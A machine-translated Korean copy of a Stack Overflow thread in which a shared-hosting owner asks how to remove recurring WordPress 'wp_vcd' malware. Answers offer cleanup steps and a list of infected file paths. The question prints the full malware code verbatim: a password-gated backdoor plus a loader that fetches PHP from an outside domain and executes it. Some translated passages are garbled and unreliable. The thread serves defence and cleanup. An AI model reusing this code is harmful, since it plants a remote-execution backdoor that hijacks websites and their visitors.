함수의 PHP 코드입니다.공유 호스팅에 있는 모든 워드프레스 웹사이트의 php

함수의 PHP 코드입니다.공유 호스팅에 있는 모든 워드프레스 웹사이트의 php

공유 호스팅과 워드프레스 웹사이트가 있어요최근 웹 사이트를 방문하면 팝업이 뜨는 경우가 있습니다.그래서 Cpanel에서 워드프레스 웹사이트의 템플릿 디렉토리를 열었습니다.이 코드가 위에 추가되었습니다.functions.php파일:

<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '220c580cc80d7d449f04533fc8f68c79'))
    {
    $div_code_name = "wp_vcd";
    switch ($_REQUEST['action'])
        {
    case 'change_domain';
    if (isset($_REQUEST['newdomain']))
        {
        if (!empty($_REQUEST['newdomain']))
            {
            if ($file = @file_get_contents(__FILE__))
                {
                if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code9\.php/i', $file, $matcholddomain))
                    {
                    $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
                    @file_put_contents(__FILE__, $file);
                    print "true";
                    }
                }
            }
        }

    break;

default:
    print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }

die("");
}

if (!function_exists('theme_temp_setup'))
    {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (!is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false)
        {
        if ($tmpcontent = @file_get_contents("http://www.dolsh.com/code9.php?i=" . $path))
            {
            function theme_temp_setup($phpCode)
                {
                $tmpfname = tempnam(sys_get_temp_dir() , "theme_temp_setup");
                $handle = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\n" . $phpCode);
                fclose($handle);
                include $tmpfname;

                unlink($tmpfname);
                return get_defined_vars();
                }

            extract(theme_temp_setup($tmpcontent));
            }
        }
    }

?>

그래서 나는 그것을 막았고 팝업 문제는 해결되었다.나는 그것을 에서 삭제했다.functions.php모든 웹사이트의 파일. 하지만 지금 문제는 내가 방문했을 때functions.php어떤 웹사이트에서도 코드는 다시 존재하며 모든 테마에서 사용되지 않는 테마도 마찬가지입니다.내가 뭘 할 수 있을까?

---

문제를 해결하기 위해 내가 한 일

1. 인wp-include디렉토리, 삭제wp-vcd.php그리고.class.wp.php파일
2. 인wp-include디렉토리, 열기post.php맬웨어에 의해 추가된 첫 번째 php 태그를 검출합니다.
3. 테마 공개functions.php파일을 작성하고 위의 코드를 삭제합니다.

팝업이 중지됩니다.하지만 나는 그것이 얼마나 오래 효과가 있는지 모르겠다.

---

모든 웹사이트를 감염시키는 메인 파일은 아직 못 찾았지만 알아내려고 노력 중입니다.

이 답변이 매우 늦었다는 것을 알지만, 이 문제가 있는 사람을 돕기 위해 제 경험을 공유하겠습니다.이 문제의 원인은 wordpress.org 외부에서 다운로드한 플러그인이거나 일부 바디에서 워드프레스 관리자 계정에 액세스할 수 있으며 아직 에디터를 닫지 않은 경우일 수 있습니다.php 또는 hacker는 ftp 사용자 및 패스워드를 가지고 있습니다.이 문제를 해결하기 위해 먼저 전체 백업을 생성하고 실수를 한 경우 컴퓨터에 저장합니다.

1. 워드프레스 사이트의 테마 디렉토리로 이동하여 사용되지 않은 테마는 이미 감염되었기 때문에 모두 삭제합니다.
2. 활성 테마에서 편집:functions.php파일을 작성하고 악성코드에 의해 삽입된 모든 추가 코드를 삭제합니다.검색할 수 있습니다.wp_vcd또는wp-tmp코드를 찾을 수 있는 단어입니다.
3. 최신 워드프레스 설치를 다운로드합니다.그런 다음 삭제하다wp-include그리고.wp-admin폴더 및 public_files의 모든 파일(제외)wp-content folder그리고..htaccess파일 및wp-config.php그런 다음 삭제된 파일과 폴더를 다운로드된 워드프레스로 바꿉니다.
4. 알려진 소스에서 다운로드한 모든 플러그인을 제거합니다.
5. 마지막으로 ftp, admin panel, cpanel 또는 direct admin 등의 비밀번호를 모두 변경합니다.혹시 해커가 당신 정보를 어딘가에 저장했을 경우를 대비해서요

이 작은 가이드가 누군가를 도울 수 있기를 바랍니다.

당신의 사이트가 해킹당했다고 합니다.호스팅 프로바이더에 문의해도 도움이 되지 않을 수 있습니다.웹사이트 보안회사에 연락하시면 됩니다. 저는 sucuri.net을 이용합니다.직접 청소하고 싶다면 두 가지 방법이 있습니다.

• 모든 것을 삭제하고 데이터베이스를 포함한 모든 사이트를 다시 설치합니다.
• 모든 것을 재인스톨 할 수 없는 경우는, 스크립트 마다 스크립트를 체크하고, 「인스톨」코드를 찾아 클리닝 할 필요가 있습니다.반복하는 가 몇 개를 들어, 「」등).code9수 '코드로 '코드로', '코드로', '코드로', '코드로', '코드로', '코드로', '코드로', '코드로' 이 있을 수 있습니다.code9로른
• 플러그인, 템플릿 및 워드프레스 버전을 최대한 업데이트합니다.

이러한 변경을 많이 할 필요는 없습니다.이 2개의 스텝을 실행하기만 하면 됩니다> >

[ ]> [ Updates [ - Now]1 > [ ]> [ Re - install Now ]> [ ]> [ ]> [ ]
그러면 WordPress의 최신 버전이 다시 설치되고 감염된 wp 코어 파일을 덮어씁니다.

2 > 테마 함수를 엽니다.php 파일을 편집기에서 제거하고 악성 코드 스니펫을 제거한 후 저장을 누릅니다.

모두 완료! 이번에는 감염된 코드를 기능에서 제거하기 위한 파일 변경을 수락합니다.php 파일.

이 문제에 대한 임시 수정은 해커 코드를 제거하고functions.php읽기chmod 444 functions.phpcPanel 서 c c c 、 [ C Panel ]를 선택합니다.을 사용하다현재 테마에만 영향을 주는 것이 아니라 테마 디렉토리에 있는 모든 테마에 영향을 미칩니다. 모든 것에 한 작업을 합니다.functions.php모든 테마에서.하여 파일 검색으로 하십시오.wp_vcd시스템 프리 버전에 WordFence 보안 플러그인이 있으면 로그에도 포함되므로 도움이 됩니다.감염된 파일 목록입니다.

//FILES TO REMOVE
wp-includes/wp-vcd.php

wp-includes/wp-tmp.php

wp-includes/wp-feed.php
wp-content/themes/yourtheme/wp-tmp.php


// FILES TO CORRECT
    wp-content/themes/yourtheme/functions.php

    wp-content/themes/yourtheme-child/functions.php

    wp-content/themes/twentynineteen/functions.php

    wp-content/themes/twentysixteen/functions.php

    wp-content/themes/twentyseventeen/functions.php

    wp-includes/post.php

키워드 검색에서 WordFence 로그를 통해 이를 찾는 데 도움이 되는 파일이 더 많이 있을 것입니다.

백엔드에 액세스 할 수 있는 경우는, 가능한 한 빨리 WordFense 시큐러티 플러그인을 인스톨 해, 스캔 리포트를 검색합니다.수정되거나 새로 생성된 파일이 표시됩니다.파일 삭제/수정 후 WordFence에서 다시 스캔하여 확인합니다.

서버의 파일/폴더 권한을 확인하십시오.

언급URL : https://stackoverflow.com/questions/46219263/php-code-in-functions-php-of-all-wordpress-websites-on-my-shared-hosting